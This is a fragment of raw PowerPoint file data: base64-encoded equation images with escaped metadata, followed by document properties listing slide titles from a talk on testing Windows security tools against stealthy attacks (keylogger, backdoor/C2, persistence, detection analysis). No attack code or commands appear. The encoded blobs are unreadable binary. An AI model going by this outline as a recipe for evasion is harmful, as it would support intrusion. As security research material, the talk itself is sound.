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\&quot;,\&quot;slideId\&quot;:320,\&quot;accessibleText\&quot;:\&quot;open square brackets table row cell y open parentheses t close parentheses end cell cell x subscript i open parentheses t close parentheses end cell end table close square brackets to the power of T\&quot;,\&quot;imageHeight\&quot;:17.83783783783784},{\&quot;mathml\&quot;:\&quot;&lt;math style=\\\&quot;font-family:stix;font-size:16px;\\\&quot; xmlns=\\\&quot;http://www.w3.org/1998/Math/MathML\\\&quot;&gt;&lt;mstyle mathsize=\\\&quot;16px\\\&quot;&gt;&lt;mi&gt;R&lt;/mi&gt;&lt;mo&gt;&amp;#xA0;&lt;/mo&gt;&lt;mo&gt;=&lt;/mo&gt;&lt;mo&gt;&amp;#x2009;&lt;/mo&gt;&lt;mfenced open=\\\&quot;[\\\&quot; close=\\\&quot;]\\\&quot;&gt;&lt;mtable&gt;&lt;mtr&gt;&lt;mtd&gt;&lt;mn&gt;1&lt;/mn&gt;&lt;/mtd&gt;&lt;mtd&gt;&lt;mn&gt;0&lt;/mn&gt;&lt;/mtd&gt;&lt;/mtr&gt;&lt;mtr&gt;&lt;mtd&gt;&lt;mn&gt;0&lt;/mn&gt;&lt;/mtd&gt;&lt;mtd&gt;&lt;mn&gt;20&lt;/mn&gt;&lt;/mtd&gt;&lt;/mtr&gt;&lt;/mtable&gt;&lt;/mfenced&gt;&lt;/mstyle&gt;&lt;/math&gt;\&quot;,\&quot;base64Image\&quot;:\&quot;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HoW9OGH8HsX2gXVmncmDIChni7UZ47G5xv5zHu9cY8lOycSnY56EZnZftc7kQUBQVvop+2nJeBypsf9jJX0/slynZOITKc9i+8g6s87kQRCUs9HxkvG4WmPfv87gBWvYHJkwbmmztb831G+6l+XLUL6zqnUmDwKCMtvHofwphjpeab8glG9tvtpyzTJxL5GXsX3WYN8/Fv1+Yp3Jg4CgrNLNkjEZraHPrSV9XrNUs+ybMGavQjMv0Xvr7b0ct60zeRAQlFXbUTImZ2ros2xTrM2Waqmd74zZFw32nZ6AeVb0+7V1Jg8CgrJq6X6Bhz3GJP1UUOVX7ouKT/nd+rtrmZba/M6YbWuw74lb4qd5XGidyYOAoKzDnpJx2VNhX9+U9LXNMu1pY/jzfRS7G+z7o/Dnd/Wcs87kQUBQ1vntya0GPmXODZ0dS7v1c90S7Wld8Q3D2/H6RwPrYkXo3LvxU/jrzaXrrTN5EBCUdfo49H6yYWfNn2bTV/Ce0OkubRT2PGMNN9XuW2fyICAom7Cvx9ikHUen81bbJSUX132Gv6v0c8qzASpMUjtoncmDgKBsyg89xudin8dMX+f/3OO4pw17VyuKC/abAWvLrDN5EBCUTfqxxxid7ON453oc77zh7mpp6GyvPmiFyRXrTB4EBOVMOF6S6HMeIV0c2+UexzlhmLua+MjuoLWt1pk8CAjKmZIet/yjy1ill7kdiO2DSf5e2qRrrMffTfcEbDe8XaV7Lm4PaGGS7n2ZY53Jg4CgnEnpBsMzJeOWLgI/F63siZL01ftSw9pVuvBfH9DCJLVj1pk8CAjKQbEqtu9Df4+zpr050j0EHxrGUiMDXJi8aWAOrTN5EASloOzrk316wdx3ofPukt9jexHbeNHS/75X/LfDxZ+dY9iwzuRBQFACyIMgKAHkQUBQAsiDICgB5EFAUALIgyAoAeRBQFACyIMgKAUlIA/KgyAoAeRBQFAC8qA8CIISQB4EBCWAPAiCEkAeBAQlgDwIghJAHgQaC8omGkA343IUKE4EPqA4kaNAcQKgOAEUJ4DiRI4CxYnABxQngOIEUJzIUaA4EfiA4gRQnACKk4Zz1P8BNSqbuLZA8loAAAE2dEVYdE1hdGhNTAA8bWF0aCB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMTk5OC9NYXRoL01hdGhNTCI+PG1zdHlsZSBtYXRoc2l6ZT0iMTZweCI+PG1pPlI8L21pPjxtbz4mI3hBMDs8L21vPjxtbz49PC9tbz48bW8+JiN4MjAwOTs8L21vPjxtZmVuY2VkIGNsb3NlPSJdIiBvcGVuPSJbIj48bXRhYmxlPjxtdHI+PG10ZD48bW4+MTwvbW4+PC9tdGQ+PG10ZD48bW4+MDwvbW4+PC9tdGQ+PC9tdHI+PG10cj48bXRkPjxtbj4wPC9tbj48L210ZD48bXRkPjxtbj4yMDwvbW4+PC9tdGQ+PC9tdHI+PC9tdGFibGU+PC9tZmVuY2VkPjwvbXN0eWxlPjwvbWF0aD7Ye9LHAAAAAElFTkSuQmCC\&quot;,\&quot;slideId\&quot;:321,\&quot;accessibleText\&quot;:\&quot;R space equals thin space open square brackets table row 1 0 row 0 20 end table close square brackets\&quot;,\&quot;imageHeight\&quot;:28.54054054054054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1760</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Widescreen</PresentationFormat>
  <Paragraphs>244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Arial,Sans-Serif</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Calibri Light</vt:lpstr>
      <vt:lpstr>Consolas</vt:lpstr>
      <vt:lpstr>Grandview Display</vt:lpstr>
      <vt:lpstr>ITC Avant Garde Std Bk</vt:lpstr>
      <vt:lpstr>DashVTI</vt:lpstr>
      <vt:lpstr>Advanced Security Evasion in Windows</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Introduction</vt:lpstr>
      <vt:lpstr>So, why test security solutions against stealthy attack techniques in Windows? </vt:lpstr>
      <vt:lpstr>Methodology: How We Test Detection?</vt:lpstr>
      <vt:lpstr>Methodology: What We Monitor?</vt:lpstr>
      <vt:lpstr>Five-Stage Kill Chain – End-to-End Breach Scenario</vt:lpstr>
      <vt:lpstr>Hidden Command in a File – Experimental Steps </vt:lpstr>
      <vt:lpstr>Keylogger Deployment &amp; Execution – Experimental Steps</vt:lpstr>
      <vt:lpstr>Backdoor / Command-and-Control – Experimental Steps</vt:lpstr>
      <vt:lpstr>Persistence Techniques – Experimental Steps</vt:lpstr>
      <vt:lpstr>View From Both Sides: Attacker Device</vt:lpstr>
      <vt:lpstr>View From Both Sides: Attacker Device</vt:lpstr>
      <vt:lpstr>View From Victim Device: Backdoor Execution &amp; System Impact</vt:lpstr>
      <vt:lpstr>Experimental Resource Impact</vt:lpstr>
      <vt:lpstr>Analysis of Detection Effectiveness</vt:lpstr>
      <vt:lpstr>Delivery Stage: Warning during download and execution</vt:lpstr>
      <vt:lpstr>System Privileges and Risk Visibility (Event ID 4672)</vt:lpstr>
      <vt:lpstr>Network traffic (outbound/inbound connections): Wireshark</vt:lpstr>
      <vt:lpstr>Discussion</vt:lpstr>
      <vt:lpstr>Conclusion: Multi-Stage Stealth, Limited Detection</vt:lpstr>
      <vt:lpstr>Actionable Recommendations</vt:lpstr>
      <vt:lpstr>THANK YOU! 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Michaella – BRANDON &amp; BRANDA</dc:creator>
  <cp:lastModifiedBy>SIPAKAM WOKAM Cédric Djibril</cp:lastModifiedBy>
  <cp:revision>1</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-12-07T12:19:04Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-05-12T20:56:35Z</dcterms:modified>
</cp:coreProperties>
</file>